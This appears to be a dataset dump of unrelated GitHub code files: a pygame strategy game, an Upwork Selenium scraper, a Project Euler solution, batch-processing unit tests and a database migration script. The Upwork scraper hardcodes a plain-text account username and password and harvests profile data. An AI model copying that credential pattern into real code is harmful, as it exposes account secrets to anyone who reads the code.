pygame.mouse.get_pos()\r\n if evento.button == 1: # botão esquerdo | Selecionar Tropas\r\n if self.verifica_tropa_br(pos) is not None:\r\n t = self.verifica_tropa_br(pos)\r\n t.cor = AMARELO # seleciona uma tropa caso uma já exista no lugar,\r\n # a pinta de AMARELO e a adiciona a lista de tropas selecionadas\r\n if t not in self.tropas_selecionadas_br:\r\n self.tropas_selecionadas_br.append(t)\r\n self.organiza_tropas_selecionadas()\r\n\r\n if evento.button == 1: # botão esquerdo | Criar Tropas\r\n mouse_pos = pygame.mouse.get_pos()\r\n if 125 <= mouse_pos[0] <= 125+30 and 375 <= mouse_pos[1] <= 375+40 and self.verifica_tropas((125+20, 375+60)) == (None, None) and self.num_gold_br >=25:\r\n self.num_gold_br -=25\r\n self.cria_tropa_br((125+20, 375+60))\r\n\r\n if evento.button == 3: # botão direito | Colocar Worker p Trbalahar\r\n if self.tropas_selecionadas_br is not None and self.verifica_mina_br(pos) is not None:\r\n for tropa in self.tropas_selecionadas_br:\r\n if isinstance(tropa, Worker):\r\n tropa.trabalha(self.verifica_mina_br(pos))\r\n self.tropas_selecionadas_br.remove(tropa)\r\n\r\n if evento.type == pygame.MOUSEBUTTONDOWN and playerId == 1: #Clique playerId=1 (SP)\r\n pos = pygame.mouse.get_pos()\r\n if evento.button == 1: # botão esquerdo | Selecionar Tropas\r\n if self.verifica_tropa_sp(pos) is not None:\r\n t = self.verifica_tropa_sp(pos)\r\n t.cor = AMARELO # seleciona uma tropa caso uma já exista no lugar,\r\n # a pinta de AMARELO e a adiciona a lista de tropas selecionadas\r\n if t not in self.tropas_selecionadas_sp:\r\n self.tropas_selecionadas_sp.append(t)\r\n self.organiza_tropas_selecionadas()\r\n\r\n if evento.button == 1: # botão esquerdo | Criar Tropas\r\n mouse_pos = pygame.mouse.get_pos()\r\n if 685 <= mouse_pos[0] <= 685+30 and 200 <= mouse_pos[1] <= 200+40 and self.verifica_tropas((685+20, 205+50)) == (None, None) and self.num_gold_sp >=20:\r\n self.num_gold_sp -=20\r\n self.cria_tropa_sp((685+20, 205+50))\r\n\r\n if evento.button == 3: # botão direito\r\n if self.tropas_selecionadas_sp is not None and self.verifica_mina_sp(pos) is not None:\r\n for tropa in self.tropas_selecionadas_sp:\r\n if isinstance(tropa, Worker):\r\n tropa.trabalha(self.verifica_mina_sp(pos))\r\n self.tropas_selecionadas_sp.remove(tropa)\r\n\r\n if evento.type == pygame.KEYDOWN and playerId == 0: #playerId=0 (BR) pressiona botao do teclado\r\n pos = pygame.mouse.get_pos()\r\n\r\n self.organiza_tropas_selecionadas()\r\n\r\n if evento.key == pygame.K_e: #Apertar \"e\" limpa lista de tropas selecionadas\r\n for tropa in self.tropas_selecionadas_br:\r\n tropa.cor = AZUL\r\n self.tropas_selecionadas_br.clear()\r\n\r\n if evento.key == pygame.K_r: #Apertar \"r\" cria trabalhadores\r\n if self.verifica_tropas((220, 400+30)) == (None, None) and self.num_gold_br >= 25:\r\n self.num_gold_br -= 25\r\n self.cria_worker_br((220, 400+30)) # cria uma tropa caso não hajam outras tropas ou florestas no lugar\r\n\r\n if evento.key == pygame.K_w: #W\r\n for tropa in self.tropas_selecionadas_br:\r\n next = (tropa.pos[0], tropa.pos[1] - num_linhas)\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_s: #S\r\n for tropa in reversed(self.tropas_selecionadas_br):\r\n next = (tropa.pos[0], tropa.pos[1] + num_linhas)\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_d: #D\r\n for tropa in reversed(self.tropas_selecionadas_br):\r\n next = (tropa.pos[0] + num_colunas, tropa.pos[1])\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_a: #A\r\n for tropa in self.tropas_selecionadas_br:\r\n next = (tropa.pos[0] - num_colunas, tropa.pos[1])\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.type == pygame.KEYDOWN and playerId == 1: #playerId=1 (SP) pressiona botao do teclado\r\n pos = pygame.mouse.get_pos()\r\n\r\n self.organiza_tropas_selecionadas()\r\n\r\n if evento.key == pygame.K_e: #Apertar \"e\" limpa lista de tropas selecionadas\r\n for tropa in self.tropas_selecionadas_sp:\r\n tropa.cor = AZUL\r\n self.tropas_selecionadas_sp.clear()\r\n\r\n if evento.key == pygame.K_r: #Apertar \"r\" cria trabalhadores\r\n if self.verifica_tropas((580, 200+30)) == (None, None) and self.num_gold_sp >= 20:\r\n self.num_gold_sp -= 20\r\n self.cria_worker_sp((580, 200+30)) # cria uma tropa caso não hajam outras tropas ou florestas no lugar\r\n\r\n if evento.key == pygame.K_w: #W\r\n for tropa in self.tropas_selecionadas_sp:\r\n next = (tropa.pos[0], tropa.pos[1] - num_linhas)\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_s: #S\r\n for tropa in reversed(self.tropas_selecionadas_sp):\r\n next = (tropa.pos[0], tropa.pos[1] + num_linhas)\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_d: #D\r\n for tropa in reversed(self.tropas_selecionadas_sp):\r\n next = (tropa.pos[0] + num_colunas, tropa.pos[1])\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if evento.key == pygame.K_a: #A\r\n for tropa in self.tropas_selecionadas_sp:\r\n next = (tropa.pos[0] - num_colunas, tropa.pos[1])\r\n if self.verifica_floresta(next) is None and self.verifica_tropas(next) == (None, None):\r\n tropa.pos = next\r\n\r\n if playerId == 0:\r\n self.atacar_br()\r\n else:\r\n self.atacar_sp()\r\n\r\n self.mata_tropas()\r\n\r\n def verifica_tropa_br(self, pos): # Verifica se alguma tropa brasileira já está nessa posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n for tropa in self.lista_tropas_br:\r\n if pos == tropa.pos:\r\n return tropa\r\n return None\r\n\r\n def verifica_tropa_sp(self, pos): # Verifica se alguma tropa paulista já está nessa posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n for tropa in self.lista_tropas_sp:\r\n if pos == tropa.pos:\r\n return tropa\r\n return None\r\n\r\n def verifica_tropas(self, pos): #Retorna uma tupla com os resultados de verifica_tropa_br e verifica_tropa_sp, respectivamente\r\n\r\n br = self.verifica_tropa_br(pos)\r\n sp = self.verifica_tropa_sp(pos)\r\n return (br, sp)\r\n\r\n def atacar_br(self): #Deve ser invocado pelo Brasil\r\n\r\n for tropa in self.lista_tropas_br:\r\n\r\n if not isinstance(tropa, Worker):\r\n if self.screen_coordinates_to_grid(tropa.pos) == (35, 11) or self.screen_coordinates_to_grid(tropa.pos) == (34, 11) or self.screen_coordinates_to_grid(tropa.pos) == (35, 10) or self.screen_coordinates_to_grid(tropa.pos) == (34, 10):\r\n self.lista_construcoes_sp[0].vida -= 1\r\n\r\n else:\r\n direita = (tropa.pos[0] + num_colunas, tropa.pos[1])\r\n esquerda = (tropa.pos[0] - num_colunas, tropa.pos[1])\r\n baixo = (tropa.pos[0], tropa.pos[1] + num_linhas)\r\n cima = (tropa.pos[0], tropa.pos[1] - num_linhas)\r\n\r\n tiles_adjacentes = []\r\n tiles_adjacentes.clear()\r\n\r\n tiles_adjacentes.append(self.verifica_tropa_sp(direita))\r\n tiles_adjacentes.append(self.verifica_tropa_sp(esquerda))\r\n tiles_adjacentes.append(self.verifica_tropa_sp(baixo))\r\n tiles_adjacentes.append(self.verifica_tropa_sp(cima))\r\n\r\n tropas_adjacentes = []\r\n tropas_adjacentes.clear()\r\n\r\n tropas_adjacentes = [i for i in tiles_adjacentes if i != None]\r\n\r\n if tropas_adjacentes:\r\n tropa_atacada = random.choice(tropas_adjacentes)\r\n tropa_atacada.vida -= 1\r\n\r\n def atacar_sp(self): #Deve ser invocado por Sao Paulo\r\n for tropa in self.lista_tropas_sp:\r\n if not isinstance(tropa, Worker):\r\n if self.screen_coordinates_to_grid(tropa.pos) == (7, 19) or self.screen_coordinates_to_grid(tropa.pos) == (7, 20) or self.screen_coordinates_to_grid(tropa.pos) == (6, 19) or self.screen_coordinates_to_grid(tropa.pos) == (6, 20):\r\n self.lista_construcoes_br[0].vida -= 1\r\n\r\n else:\r\n direita = (tropa.pos[0] + num_colunas, tropa.pos[1])\r\n esquerda = (tropa.pos[0] - num_colunas, tropa.pos[1])\r\n baixo = (tropa.pos[0], tropa.pos[1] + num_linhas)\r\n cima = (tropa.pos[0], tropa.pos[1] - num_linhas)\r\n\r\n tiles_adjacentes = []\r\n tiles_adjacentes.clear()\r\n\r\n tiles_adjacentes.append(self.verifica_tropa_br(direita))\r\n tiles_adjacentes.append(self.verifica_tropa_br(esquerda))\r\n tiles_adjacentes.append(self.verifica_tropa_br(baixo))\r\n tiles_adjacentes.append(self.verifica_tropa_br(cima))\r\n\r\n tropas_adjacentes = []\r\n tropas_adjacentes.clear()\r\n\r\n tropas_adjacentes = [i for i in tiles_adjacentes if i != None]\r\n\r\n if tropas_adjacentes:\r\n tropa_atacada = random.choice(tropas_adjacentes)\r\n tropa_atacada.vida -= 1\r\n\r\n def mata_tropas(self):\r\n for tropa in self.lista_tropas_br:\r\n if tropa.vida <= 0:\r\n self.lista_tropas_br.remove(tropa)\r\n if tropa in self.tropas_selecionadas_br:\r\n self.tropas_selecionadas_br.remove(tropa)\r\n\r\n for tropa in self.lista_tropas_sp:\r\n if tropa.vida <= 0:\r\n self.lista_tropas_sp.remove(tropa)\r\n if tropa in self.tropas_selecionadas_sp:\r\n self.tropas_selecionadas_sp.remove(tropa)\r\n\r\n def verifica_floresta(self, pos): # Verifica se alguma floresta já está nessa posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n for floresta in self.lista_florestas:\r\n if pos == floresta.pos:\r\n return floresta\r\n return None\r\n\r\n def verifica_mina_br(self, pos): # Verifica se alguma mina brasileira já está nessa posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n for mina in self.lista_minas_br:\r\n if pos == mina.pos:\r\n return mina\r\n return None\r\n\r\n def verifica_mina_sp(self, pos): # Verifica se alguma mina paulista já está nessa posição\r\n pos = self.grid_to_screen_coordinates(self.screen_coordinates_to_grid(pos))\r\n for mina in self.lista_minas_sp:\r\n if pos == mina.pos:\r\n return mina\r\n return None\r\n\r\n def verifica_minas(self, pos): #Retorna uma tupla com os resultados de verifica_mina_br e verifica_mina_sp, respectivamente\r\n\r\n br = self.verifica_mina_br(pos)\r\n sp = self.verifica_mina_sp(pos)\r\n return (br, sp)\r\n\r\n def organiza_tropas_selecionadas(self): #Organiza ambas as listas de tropas selecionadas pra facilitar movimento\r\n\r\n self.tropas_selecionadas_br.sort(key = lambda tropa: (tropa.pos[1], tropa.pos[0]))\r\n self.tropas_selecionadas_sp.sort(key = lambda tropa: (tropa.pos[1], tropa.pos[0]))\r\n\r\n def gera_mapa(self, shape=(RAZAO[1], RAZAO[0]), # gera um array de ruido 2d\r\n scale=100, octaves=6,\r\n persistence=0.5,\r\n lacunarity=2.0,\r\n seed=None):\r\n\r\n if not seed:\r\n seed = np.random.randint(0, 100)\r\n\r\n arr = np.zeros(shape)\r\n for i in range(shape[0]):\r\n for j in range(shape[1]):\r\n arr[i][j] = pnoise2(i / scale,\r\n j / scale,\r\n octaves=octaves,\r\n persistence=persistence,\r\n lacunarity=lacunarity,\r\n repeatx=1024,\r\n repeaty=1024,\r\n base=seed)\r\n max_arr = np.max(arr)\r\n min_arr = np.min(arr)\r\n norm_me = lambda x: (x - min_arr) / (max_arr - min_arr)\r\n norm_me = np.vectorize(norm_me)\r\n arr = norm_me(arr)\r\n return arr\r\n\r\n def pinta_mapa(self, array):\r\n for x in range(RAZAO[1]):\r\n for y in range(RAZAO[0]):\r\n if array[x][y] > 0.5:\r\n pos = (x * num_linhas, y * num_colunas)\r\n floresta = Floresta(pos)\r\n self.lista_florestas.append(floresta)\r\n\r\nclass Tropa:\r\n def __init__(self, pos, vida):\r\n self.control = Control()\r\n self.pos = pos\r\n self.cor = AZUL\r\n #self.image = pygame.image.load('8x8.png')\r\n self.hidden = False\r\n self.vida = vida\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Tropa):\r\n return NotImplemented\r\n return self.pos == other.pos and self.cor == other.cor and self.hidden == other.hidden\r\n\r\n def pinta_tropa_br(self, tela):\r\n grid = self.control.screen_coordinates_to_grid(self.pos)\r\n grid = self.control.grid_to_screen_coordinates(grid)\r\n if self.cor == AZUL:\r\n image = pygame.image.load('soldadobrNORMAL.png')\r\n else:\r\n image = pygame.image.load('soldadobrESCOLHIDO.png')\r\n image = pygame.transform.scale(image, (20,15))\r\n tela.blit(image, (grid[0],grid[1]))\r\n #pygame.draw.rect(tela, self.cor, (grid[0], grid[1], num_colunas, num_linhas), 0)\r\n\r\n def pinta_tropa_sp(self, tela):\r\n grid = self.control.screen_coordinates_to_grid(self.pos)\r\n grid = self.control.grid_to_screen_coordinates(grid)\r\n if self.cor == AZUL:\r\n image = pygame.image.load('soldadospNORMAL.png')\r\n else:\r\n image = pygame.image.load('soldadospESCOLHIDO.png')\r\n image = pygame.transform.scale(image, (20,15))\r\n tela.blit(image, (grid[0],grid[1]))\r\n #pygame.draw.rect(tela, self.cor, (grid[0], grid[1], num_colunas, num_linhas), 0)\r\n\r\nclass Worker(Tropa):\r\n def __init__(self, pos, vida):\r\n Tropa.__init__(self, pos, vida)\r\n self.trabalhando = False\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Worker):\r\n return NotImplemented\r\n return self.trabalhando == other.trabalhando and self.pos == other.pos #and self.cor == other.cor and self.hidden == other.hidden\r\n\r\n def trabalha(self, target):\r\n self.trabalhando = True\r\n self.pos = target.pos\r\n self.hidden = True\r\n target.lista_trabalhadores.append(self)\r\n\r\n def sair_trabalho(self, target): #essa função só deve ser chamada pelo target\r\n self.trabalhando = False\r\n self.hidden = False\r\n\r\nclass Floresta:\r\n def __init__(self, pos):\r\n self.control = Control()\r\n self.pos = pos\r\n self.cor = VERDE\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Floresta):\r\n return NotImplemented\r\n return self.pos == other.pos and self.cor == other.cor\r\n\r\n def pinta_floresta(self, tela):\r\n grid = self.control.screen_coordinates_to_grid(self.pos)\r\n grid = self.control.grid_to_screen_coordinates(grid)\r\n pygame.draw.rect(tela, self.cor, (grid[0], grid[1], num_colunas, num_linhas), 0)\r\n\r\nclass Construcao:\r\n def __init__(self, pos):\r\n self.control = Control()\r\n self.pos = pos\r\n self.cor = AZUL\r\n self.vida = 150\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Construcao):\r\n return NotImplemented\r\n return self.pos == other.pos and self.cor == other.cor\r\n\r\n def pinta_construcao_br(self, tela):\r\n grid = self.control.screen_coordinates_to_grid(self.pos)\r\n grid = self.control.grid_to_screen_coordinates(grid)\r\n image = pygame.image.load('base-brasil.png')\r\n image = pygame.transform.scale(image, (40,30))\r\n tela.blit(image, (grid[0], grid[1]))\r\n\r\n def pinta_construcao_sp(self, tela):\r\n grid = self.control.screen_coordinates_to_grid(self.pos)\r\n grid = self.control.grid_to_screen_coordinates(grid)\r\n image = pygame.image.load('base-sao-paulo.png')\r\n image = pygame.transform.scale(image, (40,30))\r\n tela.blit(image, (grid[0], grid[1]))\r\n\r\nclass Mina:\r\n def __init__(self, pos):\r\n self.control = Control()\r\n self.pos = pos\r\n self.cor = AMARELO_CLARO\r\n self.estoque = 10000\r\n self.lista_trabalhadores = []\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Mina):\r\n return NotImplemented\r\n return self.pos == other.pos and self.cor == other.cor and self.estoque == other.estoque and self.lista_trabalhadores == other.lista_trabalhadores\r\n\r\n def pinta_mina_br(self, tela):\r\n #grid = self.control.grid_to_screen_coordinates(self.pos)\r\n grid = self.pos\r\n image = pygame.image.load('mina-brasil.png')\r\n image = pygame.transform.scale(image, (20,20))\r\n tela.blit(image, (grid[0], grid[1]))\r\n\r\n def pinta_mina_sp(self, tela):\r\n #grid = self.control.grid_to_screen_coordinates(self.pos)\r\n grid = self.pos\r\n image = pygame.image.load('mina-sao-paulo.png')\r\n image = pygame.transform.scale(image, (20,20))\r\n tela.blit(image, (grid[0], grid[1]))\r\n\r\n def computa_trabalho(self):\r\n gold = 0\r\n for worker in self.lista_trabalhadores:\r\n self.estoque = self.estoque - 1\r\n if self.estoque == 0:\r\n del self\r\n gold = gold+1\r\n return gold\r\n","repo_name":"MaryanneCerqueira/RTS","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":25862,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21701181611","text":"import requests\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nimport time\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import NoSuchElementException\nfrom fake_useragent import UserAgent\nimport json\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nclass Crawler:\n\n def __init__(self):\n self.url = 'https://www.upwork.com/ab/account-security/login'\n self.username_xpath = '//*[@id=\"login_username\"]'\n self.continue_mail_xpath = '//*[@id=\"login_password_continue\"]'\n self.password_xpath = '//*[@id=\"login_password\"]'\n self.login_button_xpath = '//*[@id=\"login_control_continue\"]'\n self.job_list = []\n self.driver = None\n self.user_agent = UserAgent().google \n\n def login(self):\n self.driver.get(self.url)\n time.sleep(1)\n print('writing username...')\n self.driver.find_element(By.XPATH, self.username_xpath).send_keys('bobsuperworker')\n self.driver.find_element(By.XPATH, self.continue_mail_xpath).click()\n time.sleep(1)\n print('writing password...')\n # improvment : Password should be stored as an environment variable\n self.driver.find_element(By.XPATH, self.password_xpath).send_keys('Argyleawesome123!')\n self.driver.find_element(By.XPATH, self.login_button_xpath).click()\n print('loggin in...')\n time.sleep(5)\n\n def initialize_driver(self):\n options = Options()\n options.add_argument(f\"user-agent={self.user_agent}\")\n options.add_argument(\"start-maximized\")\n options.add_argument(\"--headless\")\n self.driver = webdriver.Chrome(chrome_options=options)\n self.driver.get(self.url)\n print('Driver Initialized')\n return self.driver\n\n def get_sections(self):\n sections = self.driver.find_elements(By.TAG_NAME, 'section')\n return sections\n\n def get_title(self, section):\n WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.TAG_NAME, \"h4\")))\n return section.find_element(By.TAG_NAME, 'h4').text\n\n def job_infos(self, section):\n # Improvment : each section could be stored independently\n return section.find_element(By.XPATH, './/div/div/div/div[2]/div/small[1]').text\n\n def job_description(self, section):\n return section.find_element(By.XPATH, './/div/div/div/div[2]/div/div[2]/div/div').text\n\n def job_skills(self, section):\n # Improvment : each skill could be stored in a list\n try:\n skills = section.find_element(By.CLASS_NAME, 'skills').text\n except Exception:\n skills = 'None'\n return skills\n\n def job_proposals(self, section):\n return section.find_element(By.XPATH, './/div/div/div/div[2]/div/div[3]').text\n\n def get_payment_info(self, section):\n payment = section.find_element(By.XPATH, './/div/div/div/div[2]/div/small[2]/span/span/span[3]/span')\n if payment.text == 'Payment verified':\n return True\n else:\n return False\n\n def get_amount_spent(self, section):\n return section.find_element(By.XPATH, './/div/div/div/div[2]/div/small[2]/span/span/span[4]').text\n\n def get_client_location(self, section):\n try:\n return section.find_element(By.CLASS_NAME, 'client-location').text\n except Exception:\n return 'None'\n\n def access_profile_page(self):\n profile = self.driver.find_element(By.XPATH, '//*[@id=\"nav-right\"]/ul/li[1]/ul/li[4]/a')\n profile_path = profile.get_attribute('href')\n self.driver.get(profile_path)\n\n def get_personnal_details(self):\n time.sleep(3)\n section = self.driver.find_element(By.XPATH, '//*[@id=\"main\"]/div[2]/div[2]/div[2]/div/div[1]/div[1]/section[1]/div/div[1]/div[1]/div')\n profile = {}\n profile['name'] = section.find_element(By.XPATH, './/div[2]/div/div[1]').text\n profile['location'] = section.find_element(By.XPATH, './/div[2]/div/div[2]').text\n profile['avatar'] = section.find_element(By.XPATH, './/div[1]/div/div/img').text\n return profile\n \n def get_professional_details(self):\n section = self.driver.find_element(By.XPATH, '//*[@id=\"main\"]/div[2]/div[2]/div[2]/div/div[1]/div[1]/section[2]')\n profile = {}\n profile['profession'] = section.find_element(By.XPATH, './/div[2]/section[1]/div[1]/div/div[1]/h2').text\n profile['rate'] = section.find_element(By.XPATH, './/div[2]/section[1]/div[1]/div/div[2]/div[1]/h3/span').text\n profile['description'] = section.find_element(By.XPATH, './/*[@id=\"up-line-clamp-v2-2\"]/span').text\n profile['availability'] = section.find_element(By.XPATH, './/div[1]/aside/section[4]/div[2]/p/span').text\n profile['languages'] = section.find_element(By.XPATH, './/div[1]/aside/section[4]/div[3]/ul').text\n profile['education'] = section.find_element(By.XPATH, './/div[1]/aside/section[4]/div[5]/ul').text\n profile['work_history'] = section.find_element(By.XPATH, './/div[2]/section[2]/div/div[3]/div/span').text\n profile['skills'] = section.find_element(By.XPATH, './/div[2]/section[4]/div/ul').text\n profile['employment_history'] = self.driver.find_element(By.XPATH, '//*[@id=\"main\"]/div[2]/div[2]/div[2]/div/div[1]/div[9]/section/div/ul').text\n return profile\n\n def get_profile_data(self):\n profile = {**self.get_personnal_details(), **self.get_professional_details()}\n return profile\n\n def write_json_file(self, object, file_name):\n f = open(f\"{file_name}.json\", \"w\")\n f.write(json.dumps(object))\n f.close()\n \n\n def run(self):\n self.initialize_driver()\n self.login()\n sections = self.get_sections()\n jobs = []\n for s in sections:\n data = {}\n data['tite'] = self.get_title(s)\n data['infos'] = self.job_infos(s)\n data['description'] = self.job_description(s)\n data['skills'] = self.job_skills(s)\n data['proposals'] = self.job_proposals(s)\n data['payment_verified'] = self.get_payment_info(s)\n data['amount'] = self.get_amount_spent(s)\n data['location'] = self.get_client_location(s)\n jobs.append(data)\n self.write_json_file(jobs, 'jobs')\n self.access_profile_page()\n profile_data = self.get_profile_data()\n self.write_json_file(profile_data, 'profile')\n \n \n\nif __name__ == \"__main__\":\n Crawler().run()","repo_name":"alex-run-code/uwcrawler","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":6715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26570861713","text":"# -*- coding: utf-8 -*-\n\n# Problem 4 - Largest palindrome product\n\n# A palindromic number reads the same both ways. The largest palindrome made\n# from the product of two 2-digit numbers is 9009 = 91 99.\n \n# Find the largest palindrome made from the product of two 3-digit numbers.\n\n\nfrom itertools import combinations\n\n\ndef euler_4():\n def _is_palindromic(integer):\n s = str(integer)\n return all([s[i] == s[(i * -1) - 1] for i in xrange(len(s) / 2)]) \n\n palindromes = filter(_is_palindromic,\n [x[0] * x[1] for x in\n combinations(xrange(100, 1000), 2)])\n return max(palindromes)\n\n\nif __name__ == '__main__':\n assert euler_4() == 906609\n","repo_name":"jbozanowski/project-euler","sub_path":"python/euler_4.py","file_name":"euler_4.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36331744644","text":"import os\nimport unittest\nimport time\n\nimport numpy as np\nimport pandas as pd\n\nfrom batchprocessing import batchprocessing\n\nTEMPDIR = os.path.join('tests', 'temp')\n\n\nclass MyMonkeyPatch:\n def __init__(self):\n self.colnames = ['A', 'B']\n self.df = pd.DataFrame(np.zeros((100, 2)))\n self.rnd_df = pd.DataFrame(np.random.randn(100, 2))\n self.df.columns = self.colnames\n self.rnd_df.columns = self.colnames\n self.checkpoint_path=os.path.join(TEMPDIR, 'mytest')\n self.fake_cp_path = os.path.join(TEMPDIR, 'mytest_fake')\n self._delete_test_path = os.path.join(TEMPDIR, 'delete_test')\n self._n_batches = 10\n\n @batchprocessing.BatchProcessor.batch_predict_auto\n def add(self, X, n_batches=None, checkpoint_path=None, n_jobs=1):\n time.sleep(.2)\n return X + 1\n\n\nprocessor = batchprocessing.BatchProcessor(\n n_batches=1,\n checkpoint_path=os.path.join(TEMPDIR, 'mytest'),\n n_jobs=1,\n do_load_cp=False,\n )\n\n\nprocessor2 = batchprocessing.BatchProcessor(\n n_batches=10,\n checkpoint_path=os.path.join(TEMPDIR, 'mytest'),\n n_jobs=2,\n do_load_cp=False,\n )\n\n@processor._batch_predict_self\ndef my_func(X):\n return X + 1\n\n\ndef test_classbased_bp():\n X1 = pd.DataFrame(np.zeros((100, 2)))\n X2 = pd.DataFrame(np.arange(100))\n result = my_func(X=X1)\n assert np.allclose(result, pd.DataFrame(np.ones((100, 2))))\n result = my_func(X=X2)\n assert np.allclose(result, pd.DataFrame(np.arange(100))+1)\n\n\n@processor2._batch_predict_self\ndef my_func2(X):\n return X + 1\n\n\n@batchprocessing.BatchProcessor.batch_predict(checkpoint_path=os.path.join(TEMPDIR, 'mytest'), n_jobs=2, n_batches=10, do_load_cp=False)\ndef my_func3(X):\n return X + 1\n\n\ndef test_classbased_bp2():\n X1 = pd.DataFrame(np.zeros((100, 2)))\n X2 = pd.DataFrame(np.arange(100))\n result = my_func2(X=X1)\n assert np.allclose(result, pd.DataFrame(np.ones((100, 2))))\n result = my_func2(X=X2)\n assert np.allclose(result, pd.DataFrame(np.arange(100))+1)\n\n # my_func3\n result = my_func3(X=X1)\n assert np.allclose(result, pd.DataFrame(np.ones((100, 2))))\n result = my_func3(X=X2)\n assert np.allclose(result, pd.DataFrame(np.arange(100))+1)\n\n\nclass TestBatchProc(unittest.TestCase):\n def _setup(self):\n self.myobj = MyMonkeyPatch()\n self._n_batches = self.myobj._n_batches\n splits = np.array_split(self.myobj.rnd_df, self._n_batches)\n processor = batchprocessing.BatchProcessor(\n n_batches=self._n_batches,\n checkpoint_path=self.myobj.fake_cp_path)\n processor._check_makedir()\n # only save the first 5 iterations\n for i in range(5):\n splits_df = pd.DataFrame(splits[i])\n processor._save_checkpoints(\n iteration=i,\n df=splits_df,\n )\n\n def test_batch_predict(self):\n self._setup()\n x = self.myobj.add(X=self.myobj.df,\n n_batches=self._n_batches,\n checkpoint_path=self.myobj.checkpoint_path)\n assertion_df = pd.DataFrame(np.ones((100, 2)))\n assertion_df.columns = self.myobj.colnames\n assert x.shape == (100, 2)\n assert x.equals(assertion_df)\n\n def test_batch_predict_parallel(self):\n self._setup()\n x = self.myobj.add(X=self.myobj.df,\n n_batches=self._n_batches,\n checkpoint_path=self.myobj.checkpoint_path,\n n_jobs=4)\n assertion_df = pd.DataFrame(np.ones((100, 2)))\n assertion_df.columns = self.myobj.colnames\n assert x.shape == (100, 2)\n assert x.equals(assertion_df)\n\n def test_check_makedir(self):\n self._setup()\n processor = batchprocessing.BatchProcessor(\n n_batches=self._n_batches,\n checkpoint_path=self.myobj.checkpoint_path)\n processor._check_makedir()\n assert os.path.isdir(self.myobj.checkpoint_path)\n\n def test_cleanup_checkpoints(self):\n self._setup()\n processor = batchprocessing.BatchProcessor(\n n_batches=self._n_batches,\n checkpoint_path=self.myobj._delete_test_path)\n processor._check_makedir()\n processor._cleanup_checkpoints()\n assert os.path.isdir(self.myobj._delete_test_path) is False\n\n # def test_load_checkpoints(self):\n # self._setup()\n # x = self.myobj.add(X=self.myobj.df,\n # n_batches=self._n_batches,\n # checkpoint_path=self.myobj.fake_cp_path)\n # assertion_df1 = pd.DataFrame(np.ones((100, 2)))\n # assertion_df1.columns = self.myobj.colnames\n # assertion_df2 = pd.concat(\n # [self.myobj.rnd_df.iloc[:50, :], assertion_df1.iloc[50:, :]],\n # axis=0,\n # ignore_index=True\n # )\n # print(x)\n # print()\n # print(assertion_df2)\n # assert x.shape == (100, 2)\n # assert x.equals(assertion_df1) is False\n # assert np.allclose(x, assertion_df2, rtol=0.0001)\n #\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"VFMR/batchprocessing","sub_path":"tests/myunittests.py","file_name":"myunittests.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42338382791","text":"import sys\n\nsys.path.append(\"..\")\nsys.path.append(\".\")\n\nfrom IM.InfrastructureInfo import InfrastructureInfo\nfrom IM.VirtualMachine import VirtualMachine\nfrom IM.auth import Authentication\nfrom radl.radl_json import parse_radl as parse_radl_json\nfrom IM.config import Config\nfrom IM.db import DataBase\nimport time\nimport json\n\n\nclass DB150to151():\n @staticmethod\n def deserialize_vm(str_data):\n dic = json.loads(str_data)\n if dic['cloud']:\n dic['cloud'] = IM.CloudInfo.CloudInfo.deserialize(dic['cloud'])\n if dic['info']:\n dic['info'] = parse_radl_json(dic['info'])\n if dic['requested_radl']:\n dic['requested_radl'] = parse_radl_json(dic['requested_radl'])\n\n newvm = VirtualMachine(None, None, None, None, None, None, dic['im_id'])\n newvm.__dict__.update(dic)\n # If we load a VM that is not configured, set it to False\n # because the configuration process will be lost\n if newvm.configured is None:\n newvm.configured = False\n return newvm\n\n @staticmethod\n def deserialize_info(str_data):\n newinf = InfrastructureInfo()\n dic = json.loads(str_data)\n vm_list = dic['vm_list']\n vm_master_id = dic['vm_master']\n dic['vm_master'] = None\n dic['vm_list'] = []\n if dic['auth']:\n dic['auth'] = Authentication.deserialize(dic['auth'])\n if dic['radl']:\n dic['radl'] = 